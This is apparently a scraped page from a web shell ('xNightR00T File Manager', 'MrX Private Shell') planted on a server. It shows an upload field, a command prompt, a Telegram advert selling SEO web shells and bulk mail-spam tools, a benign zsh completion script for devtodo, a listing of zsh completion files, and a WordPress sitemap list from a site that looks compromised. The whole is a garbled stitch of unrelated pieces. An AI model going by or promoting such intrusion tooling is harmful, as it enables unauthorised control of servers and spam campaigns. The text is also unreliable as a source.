xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
#compdef devtodo todo tda tde tdd tdr
## completion for devtodo 0.1.20 <http://swapoff.org/DevTodo>

typeset -a arg_generic arg_add todo_opts \
           priorities
typeset -A arg_pair arg_desc
typeset -i i
typeset expl

for ((i=2; i <= $#words; i++)) {
	if [[ $words[$i] == '--database' ]]; then
		todo_opts+=(--database ${~words[$((++i))]})
	elif [[ $words[$i] == '--sort' ]]; then
		todo_opts+=(--sort ${words[$((++i))]})
	fi
}

priorities=(verylow low medium high veryhigh)

arg_add=(
	'-p[priority]:priority:_todo_priority'
	'-g[parent item]:parent:_todo_index'
)

arg_generic=(
	'--remove[remove items]:index:_todo_index'
	'--database[database file]:file:_files'
	'--global-database[global database file]:file:_files'
	'*--colour[item color]:color:_todo_color'
	'--force-colour[force use of colors]'
	'--mono[no colors]'
	'--help[display help]'
	'--version[display version]'
	'--title[todo title]:string: '
	'--date-format[strftime time formet]:time string: '
	'*--format[define format]:format:_todo_format'
	'*--use-format[output format]:format:_todo_format'
	'--sort[sort database]:sort expression:_todo_sort'
	'--paranoid[paranoid parmissions etc]'
	'--database-loaders[loader order]:database loader: '
	'--backup[backup database]:count: '
	'--timeout[display timeout]:seconds: '
	'--purge[purge completed items]:days: '
	'*'{'--filter','-f'}'[show items matching filter]:filter:_todo_filter'
	'*::item:_todo_index'
)

arg_pair=(
	'verbose'     'v'
	'add'         'a'
	'graft'       'g'
	'link'        'l'
	'reparent'    'R'
	'priority'    'p'
	'edit'        'e'
	'done'        'd'
	'not-done'    'D'
	'global'      'G'
	'TODO'        'T'
	'all'         'A'
)

arg_desc=(
	'verbose'     '[be verbose]'
	'add'         '[add item]:item'
	'graft'       '[parent item]:parent:_todo_index'
	'link'        '[link file into database]:database:_files'
	'reparent'    '[change item parent]:index:_todo_index'
	'priority'    '[item priority]:priority:_todo_priority'
	'edit'        '[edit item]:index:_todo_index'
	'done'        '[mark as done]:index:_todo_index'
	'not-done'    '[mark as undone]:index:_todo_index -u'
	'global'      '[use global database]'
	'TODO'        '[generate TODO file]'
	'all'         '[show all items]'
)

for arg in ${(k)arg_pair}; {
	arg_generic+='(--'$arg')-'${arg_pair[$arg]}${arg_desc[$arg]}
	arg_generic+='(-'${arg_pair[$arg]}')--'${arg}${arg_desc[$arg]}
}

function _todo_index () {
	typeset number text i entry last_entry depth last_depth=0 IFS=$'\n'
	typeset -a index desc
	for i in $*; do
		case $i in
			-u) todo_opts+=(--filter done)
		esac
	done
	for entry in $(todo $todo_opts -f +children --format display='%1>%i%n:%t\n'); do
		number=${entry%%:*}
		depth=$(( ${#number} - ${#${number// }} ))
		((depth)) && entry=${(j:.:)${${(s:.:):-a.${last_entry%%:*}}[2,depth+1]}}.$entry
		text=${entry#*:}
		number=${${entry%%:*}// }
		entry=$number:$text
		index+=$entry
		last_depth=$depth
		last_entry=$entry
	done
	_describe -t items index index
}

function _todo_color () {
	if compset -P '*='; then
		_wanted color expl 'color' \
		compadd black red green yellow blue magenta cyan white default
	else
		_wanted item expl 'item' \
		compadd -S '=' $priorities title info
	fi
}

function _todo_filter {
	typeset prefix
	if [[ ${#${words[$CURRENT]}} -gt 0 ]] {
		prefix=${${words[$CURRENT]}[1]}
		_wanted expression expl 'filter expression' \
		compadd -p $prefix -- all children done $priorities
	} else {
		# XXX the '-' makes problems
		_wanted expression expl 'filter expression' \
		compadd -S '' -- - + = all children done $priorities
	}
}

function _todo_format () {
	typeset prefix
	if [[ -prefix *= ]] {
		_message 'format string'
	} else {
		_wanted expression expl 'format name' \
		compadd -S '=' display generated verbose-display verbose-generated
	}
}

function _todo_priority () {
	_wanted priority expl 'priority' \
	compadd default $priorities
}

function _todo_sort () {
	typeset -a keys used_prefixes
	typeset key prefix=''
	keys=(created completed text priority duration none done)
	for key in $keys; {
		[[ $key != none ]] && keys+="-$key"
	}

	if [[ -prefix *, ]] {
		prefix=${words[$CURRENT]%,*},
		used_prefixes=(${(s:,:)prefix})
		for key in $used_prefixes; {
			[[ $key == -* ]] && used_prefixes+=$key[2,-1] || used_prefixes+=-$key
		}
	}
	_wanted expression expl 'sort expression' \
	compadd -F used_prefixes -qS , -P "$prefix" $keys
}

case $service in
	tda)
		_arguments -s $arg_add
	;;
	tde|tdd)
		_arguments -s ':index:_todo_index'
	;;
	tdr)
		zstyle ':completion:*:tdr:*' ignore-line yes
		_arguments -s '*:index:_todo_index'
	;;
	*todo)
		_arguments -s $arg_generic
	;;
esac

Filemanager

Name Type Size Permission Actions
_a2ps File 2.74 KB 0644
_aap File 2.58 KB 0644
_adb File 15.02 KB 0644
_ant File 5.96 KB 0644
_antiword File 1.08 KB 0644
_apachectl File 116 B 0644
_apm File 1.64 KB 0644
_arch_archives File 413 B 0644
_arch_namespace File 3.23 KB 0644
_arp File 1.14 KB 0644
_arping File 1.32 KB 0644
_at File 969 B 0644
_attr File 2.24 KB 0644
_awk File 975 B 0644
_baz File 15.64 KB 0644
_bind_addresses File 416 B 0644
_bison File 923 B 0644
_bittorrent File 4.8 KB 0644
_bogofilter File 5.17 KB 0644
_bzip2 File 2.17 KB 0644
_bzr File 10.53 KB 0644
_cal File 547 B 0644
_calendar File 1.37 KB 0644
_canonical_paths File 4.1 KB 0644
_cat File 1.41 KB 0644
_ccal File 778 B 0644
_cdcd File 2.09 KB 0644
_cdrdao File 8.06 KB 0644
_cdrecord File 4.75 KB 0644
_chkconfig File 777 B 0644
_chmod File 2.22 KB 0644
_chown File 2.48 KB 0644
_clay File 1.72 KB 0644
_comm File 409 B 0644
_compress File 1.38 KB 0644
_configure File 444 B 0644
_cowsay File 535 B 0644
_cp File 3.56 KB 0644
_cpio File 4.55 KB 0644
_cplay File 343 B 0644
_cssh File 795 B 0644
_ctags_tags File 170 B 0644
_cut File 2.3 KB 0644
_cvs File 28.27 KB 0644
_darcs File 1.17 KB 0644
_date File 1.11 KB 0644
_dbus File 3.46 KB 0644
_dd File 812 B 0644
_devtodo File 4.53 KB 0644
_df File 2.95 KB 0644
_dhclient File 925 B 0644
_dict File 2.09 KB 0644
_dict_words File 1.26 KB 0644
_diff File 90 B 0644
_diff_options File 6.98 KB 0644
_diffstat File 727 B 0644
_dir_list File 680 B 0644
_directories File 117 B 0644
_django File 5.86 KB 0644
_dmidecode File 935 B 0644
_domains File 585 B 0644
_du File 4.06 KB 0644
_dvi File 3.94 KB 0644
_ecasound File 8.38 KB 0644
_elinks File 2.89 KB 0644
_elm File 653 B 0644
_email_addresses File 5.32 KB 0644
_enscript File 5.24 KB 0644
_env File 429 B 0644
_espeak File 2.03 KB 0644
_etags File 2.08 KB 0644
_fakeroot File 486 B 0644
_feh File 6.85 KB 0644
_fetchmail File 554 B 0644
_ffmpeg File 8.16 KB 0644
_figlet File 1.47 KB 0644
_file_systems File 1.14 KB 0644
_files File 3.93 KB 0644
_find File 3 KB 0644
_finger File 2.11 KB 0644
_flasher File 1.62 KB 0644
_flex File 1.42 KB 0644
_fortune File 601 B 0644
_fsh File 519 B 0644
_fuser File 2.06 KB 0644
_gcc File 11.81 KB 0644
_gdb File 1.68 KB 0644
_genisoimage File 1.96 KB 0644
_getconf File 2.16 KB 0644
_getent File 1.61 KB 0644
_getfacl File 1.34 KB 0644
_getmail File 1.05 KB 0644
_git File 282.06 KB 0644
_global File 1.81 KB 0644
_global_tags File 186 B 0644
_gnu_generic File 178 B 0644
_gnupod File 5.57 KB 0644
_gnutls File 6.1 KB 0644
_go File 256 B 0644
_gpg File 12.99 KB 0644
_gphoto2 File 2.45 KB 0644
_gprof File 1.31 KB 0644
_gradle File 6.82 KB 0644
_graphicsmagick File 28.2 KB 0644
_grep File 3.98 KB 0644
_groff File 2.2 KB 0644
_groups File 1009 B 0644
_growisofs File 19.16 KB 0644
_gs File 1.58 KB 0644
_guilt File 1.52 KB 0644
_gzip File 3.52 KB 0644
_have_glob_qual File 910 B 0644
_hg File 29.08 KB 0644
_hosts File 2.63 KB 0644
_iconv File 2.55 KB 0644
_id File 453 B 0644
_ifconfig File 2.8 KB 0644
_iftop File 665 B 0644
_imagemagick File 27.45 KB 0644
_init_d File 2.55 KB 0644
_initctl File 6.18 KB 0644
_ip File 19.66 KB 0644
_irssi File 1.38 KB 0644
_ispell File 4.11 KB 0644
_java File 22.96 KB 0644
_java_class File 693 B 0644
_joe File 2.22 KB 0644
_join File 933 B 0644
_killall File 365 B 0644
_knock File 304 B 0644
_kvno File 566 B 0644
_last File 472 B 0644
_ld_debug File 1.14 KB 0644
_ldd File 1.3 KB 0644
_less File 5.54 KB 0644
_lha File 1.77 KB 0644
_links File 2.04 KB 0644
_list_files File 1.39 KB 0644
_ln File 2.96 KB 0644
_loadkeys File 595 B 0644
_locales File 349 B 0644
_locate File 4.5 KB 0644
_look File 444 B 0644
_lp File 8.08 KB 0644
_ls File 5.94 KB 0644
_lsof File 2.32 KB 0644
_lynx File 10.9 KB 0644
_lzop File 3.75 KB 0644
_mail File 432 B 0644
_mailboxes File 5.88 KB 0644
_make File 8.43 KB 0644
_man File 3.25 KB 0644
_md5sum File 457 B 0644
_mencal File 1.06 KB 0644
_metaflac File 1.42 KB 0644
_mh File 3.51 KB 0644
_mime_types File 1.13 KB 0644
_mkdir File 1.86 KB 0644
_module File 5.37 KB 0644
_monotone File 2.45 KB 0644
_mosh File 372 B 0644
_mount File 40.42 KB 0644
_mpc File 6.46 KB 0644
_mt File 3.14 KB 0644
_mtools File 3.99 KB 0644
_mtr File 725 B 0644
_mutt File 1.28 KB 0644
_my_accounts File 45 B 0644
_mysql_utils File 9.75 KB 0644
_mysqldiff File 1.1 KB 0644
_ncftp File 280 B 0644
_net_interfaces File 1.03 KB 0644
_netcat File 1.29 KB 0644
_newsgroups File 210 B 0644
_nice File 246 B 0644
_nkf File 2.1 KB 0644
_nm File 731 B 0644
_nmap File 3.38 KB 0644
_notmuch File 1.63 KB 0644
_npm File 529 B 0644
_nslookup File 5.54 KB 0644
_other_accounts File 64 B 0644
_pack File 361 B 0644
_patch File 7.95 KB 0644
_path_commands File 2.77 KB 0644
_path_files File 26.93 KB 0644
_pax File 2.72 KB 0644
_pbm File 25.25 KB 0644
_pdf File 423 B 0644
_perforce File 86.14 KB 0644
_perl File 5.21 KB 0644
_perl_basepods File 716 B 0644
_perl_modules File 4.56 KB 0644
_perldoc File 2.28 KB 0644
_pgrep File 2.09 KB 0644
_php File 2.99 KB 0644
_pids File 1.59 KB 0644
_pine File 2.88 KB 0644
_ping File 1.69 KB 0644
_pkg-config File 2.11 KB 0644
_pkg_instance File 353 B 0644
_pkgadd File 1012 B 0644
_pkginfo File 613 B 0644
_pkgrm File 551 B 0644
_pon File 443 B 0644
_ports File 285 B 0644
_postfix File 530 B 0644
_postscript File 333 B 0644
_prcs File 6.69 KB 0644
_printenv File 104 B 0644
_printers File 3.13 KB 0644
_prove File 2.25 KB 0644
_ps1234 File 3.34 KB 0644
_pspdf File 341 B 0644
_psutils File 3.69 KB 0644
_pump File 1.41 KB 0644
_pydoc File 436 B 0644
_python File 2.03 KB 0644
_qemu File 2.49 KB 0644
_quilt File 9.81 KB 0644
_raggle File 2.68 KB 0644
_rake File 2.78 KB 0644
_ranlib File 403 B 0644
_rar File 4.51 KB 0644
_rcs File 766 B 0644
_remote_files File 2.47 KB 0644
_renice File 424 B 0644
_ri File 3.72 KB 0644
_rlogin File 1.81 KB 0644
_rm File 1.53 KB 0644
_rrdtool File 491 B 0644
_rsync File 12.41 KB 0644
_rubber File 2.64 KB 0644
_ruby File 2.84 KB 0644
_sablotron File 1.77 KB 0644
_samba File 3.36 KB 0644
_sccs File 6.04 KB 0644
_screen File 6.6 KB 0644
_sed File 1.07 KB 0644
_service File 1.02 KB 0644
_services File 951 B 0644
_setfacl File 1.96 KB 0644
_sh File 547 B 0644
_showmount File 428 B 0644
_signals File 1013 B 0644
_sisu File 3.84 KB 0644
_slrn File 1.1 KB 0644
_socket File 1.06 KB 0644
_sort File 2.74 KB 0644
_spamassassin File 475 B 0644
_sqlite File 1.55 KB 0644
_sqsh File 2.11 KB 0644
_ssh File 21.46 KB 0644
_stgit File 952 B 0644
_strip File 2.31 KB 0644
_stty File 762 B 0644
_su File 1.9 KB 0644
_subversion File 10.19 KB 0644
_sudo File 1.13 KB 0644
_surfraw File 17.72 KB 0644
_sysctl File 1.67 KB 0644
_systemd File 16.49 KB 0644
_tar File 5.97 KB 0644
_tar_archive File 1014 B 0644
_tardy File 678 B 0644
_tcpdump File 4.2 KB 0644
_tcptraceroute File 583 B 0644
_telnet File 2.84 KB 0644
_terminals File 230 B 0644
_tex File 1.92 KB 0644
_texi File 129 B 0644
_texinfo File 8.52 KB 0644
_tidy File 7.13 KB 0644
_tiff File 7.06 KB 0644
_tilde_files File 676 B 0644
_time_zone File 222 B 0644
_tin File 2.07 KB 0644
_tla File 17.58 KB 0644
_tmux File 49.02 KB 0644
_todo.sh File 4.07 KB 0644
_toilet File 863 B 0644
_topgit File 177 B 0644
_totd File 287 B 0644
_tracepath File 87 B 0644
_tree File 1.87 KB 0644
_twidge File 1.67 KB 0644
_twisted File 1.37 KB 0644
_unace File 472 B 0644
_uname File 2.5 KB 0644
_unexpand File 620 B 0644
_uniq File 1.35 KB 0644
_unison File 5.39 KB 0644
_units File 2.75 KB 0644
_urls File 5.91 KB 0644
_user_admin File 1.9 KB 0644
_user_at_host File 729 B 0644
_users File 251 B 0644
_users_on File 253 B 0644
_uzbl File 304 B 0644
_vcsh File 2.86 KB 0644
_vim File 5.34 KB 0644
_vorbis File 5.57 KB 0644
_vorbiscomment File 617 B 0644
_vux File 1.77 KB 0644
_w3m File 4.42 KB 0644
_webbrowser File 210 B 0644
_wget File 8.08 KB 0644
_whereis File 36 B 0644
_whois File 4.71 KB 0644
_wiggle File 1.09 KB 0644
_xargs File 502 B 0644
_xmlsoft File 6.47 KB 0644
_xmms2 File 5.26 KB 0644
_xz File 4.1 KB 0644
_yafc File 1.8 KB 0644
_yodl File 658 B 0644
_yp File 3.17 KB 0644
_zcat File 99 B 0644
_zdump File 112 B 0644
_zfs File 17.83 KB 0644
_zfs_dataset File 2.56 KB 0644
_zfs_keysource_props File 408 B 0644
_zfs_pool File 51 B 0644
_zip File 5.25 KB 0644
_zpool File 8.96 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml